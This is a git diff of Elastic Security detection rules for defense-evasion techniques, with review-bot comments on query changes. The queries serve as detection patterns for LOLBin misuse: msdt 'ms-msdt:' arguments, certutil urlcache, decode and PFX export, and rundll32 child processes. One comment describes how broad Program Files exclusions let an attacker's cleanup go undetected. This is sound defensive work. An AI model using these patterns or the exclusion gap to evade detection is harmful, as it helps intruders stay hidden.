"c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json index 85316f7836b89..288bc6bfbdd03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json 
@@ -10,7 +10,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "query": "sequence by host.id with maxspan=5s\n [process where event.type == \"end\" and \n process.code_signature.trusted == false and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\")] by file.path\n", + "query": "sequence by host.id with maxspan=5s\n [process where event.type == \"end\" and \n process.code_signature.trusted == false and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "09443c92-46b3-45a4-8f25-383b028b258d", "severity": "medium", @@ -46,5 +78,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } 
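Review bot: The new deletion-side exclusions are path-only and broad: in EQL `*` spans directory separators, so `not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe")` silences any deleter anywhere under Program Files, and the matching `file.path` exclusion hides any deleted binary there, while the first step of the sequence still only keys on `process.code_signature.trusted == false`. An administrator-level attacker (or an updater that drops a helper under Program Files) therefore gets a free cleanup path, and `svchost.exe` as the deleting process is exactly where injected code tends to live. Consider scoping the Program Files exclusion with the signature field the rule already requires, e.g. `not (process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and process.code_signature.trusted == true)`, if your file events carry `process.code_signature.*` (confirm on your data), and record the reason for the svchost/drvinst exceptions somewhere readable, since this rule has no `note`. Minor: the new query text keeps the trailing space after `event.type == "end" and`, which the other rules in this commit trimmed.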
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json index b1dd677a10f95..ee56326107e69 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json 
@@ -12,14 +12,47 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Microsoft Diagnostics Wizard Execution", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and \n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : 
(\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", "references": [ "https://twitter.com/nao_sec/status/1530196847679401984", "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -39,12 +72,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 1 + "version": 3 } 
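Review bot: After this change the `note` for a high-severity rule is an empty string, so an analyst who receives an alert tied to the nao_sec reference (the `ms-msdt:` URI vector) gets no triage guidance at all. A short "Triage and analysis" note in the style used elsewhere in this commit would cover what the query itself distinguishes: whether the trigger was an `ms-msdt:` or `IT_RebrowseForFile` argument, a `-af /skip` launch from a shell or script host with a diagnostic package under a user-writable path, or an `msdt.exe` image running under another name or outside `System32`/`SysWOW64`, plus the usual parent-process and user checks. The ATT&CK rename to "System Binary Proxy Execution" in the second hunk is just the current technique title and needs nothing further.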
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json index 1be910d1f0203..1e135540d3e51 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json @@ -14,6 +14,43 @@ "license": "Elastic License v2", "name": "Unusual Child Processes of RunDLL32", "query": "sequence with maxspan=1h\n [process where event.type in (\"start\", \"process_started\") and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", "severity": "high", @@ -35,7 +72,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { 
@@ -49,5 +86,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json index febf708cc12d5..8221e1a74dc92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS S3 Bucket Configuration Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:s3.amazonaws.com and\n event.action:(DeleteBucketPolicy or DeleteBucketReplication or DeleteBucketCors or\n DeleteBucketEncryption or DeleteBucketLifecycle)\n and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketPolicy.html", 
@@ -24,8 +24,38 @@ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketEncryption.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketLifecycle.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "227dc608-e558-43d9-b521-150772250bae", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -54,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json index a56b2cf6e6ded..b883cfedb114b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json 
@@ -15,6 +15,28 @@ "references": [ "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6482255d-f468-45ea-a5b3-d3a7de1331ae", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json index 385f89910ab7d..81a74797c9128 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json 
@@ -11,12 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Microsoft Office Sandbox Evasion", - "query": "event.category:file and not event.type:deletion and file.name:~$*.zip\n", + "query": "event.category:file and not event.type:deletion and file.name:~$*.zip and host.os.type:macos\n", "references": [ "https://i.blackhat.com/USA-20/Wednesday/us-20-Wardle-Office-Drama-On-macOS.pdf", "https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/", "https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a", "severity": "high", @@ -27,7 +49,24 @@ "Threat Detection", "Defense Evasion" ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1497", + "name": "Virtualization/Sandbox Evasion", + "reference": "https://attack.mitre.org/techniques/T1497/" + } + ] + } + ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json index 0d24d9b347d93..ea6524fc37c8a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Scheduled Tasks AT Command Enabled", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where \n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\" and \n registry.data.strings : (\"1\", \"0x00000001\")\n", + "note": "", + "query": "registry where\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\" and\n registry.data.strings : (\"1\", \"0x00000001\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json index 510b588f33ef8..28bd1643da5bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Secure File Deletion via SDelete Utility", - "note": "## Triage and analysis\n\nVerify process details such as command line and hash to confirm this activity legitimacy.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nVerify process details such as command line and hash to confirm this activity legitimacy.", "query": "file where event.type == \"change\" and file.name : \"*AAA.AAA\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json index 9092870cdffa1..6bfa82ad68f0d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json @@ -14,6 +14,23 @@ "references": [ "https://github.com/mattifestation/PoCSubjectInterfacePackage" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json index 68e279eca8bcb..f8fcb273d58fe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json 
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "SolarWinds Process Disabling Services via Registry", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\" and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\", \n \"ConfigurationWizard*.exe\", \n \"NetflowDatabaseMaintenance*.exe\", \n \"NetFlowService*.exe\", \n \"SolarWinds.Administration*.exe\", \n \"SolarWinds.Collector.Service*.exe\" , \n \"SolarwindsDiagnostics*.exe\")\n", + "note": "", + "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\" and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\" ,\n \"SolarwindsDiagnostics*.exe\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" ], + "required_fields": [ + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback 
for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -75,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json index d939761852ca8..148879ee94cf6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suppression_rule_created.json 
@@ -14,14 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Alert Suppression Rule Created or Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and \nevent.outcome: \"success\"\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and\nevent.outcome: \"success\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f0bc081a-2346-4744-a6a4-81514817e888", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json index 557358c470c5e..44a4073ec75ba 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_certutil_commands.json
@@ -13,16 +13,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and \n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://twitter.com/egre55/status/1087685529016193025", "https://www.sysadmins.lv/blog-en/certutil-tips-and-tricks-working-with-x509-file-format.aspx", "https://docs.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for 
this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +75,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 14 + "version": 16 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json index 9228fc3856550..dfc1d97be5576 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_execution_from_mounted_device.json 
@@ -12,14 +12,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution from a Mounted Device", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
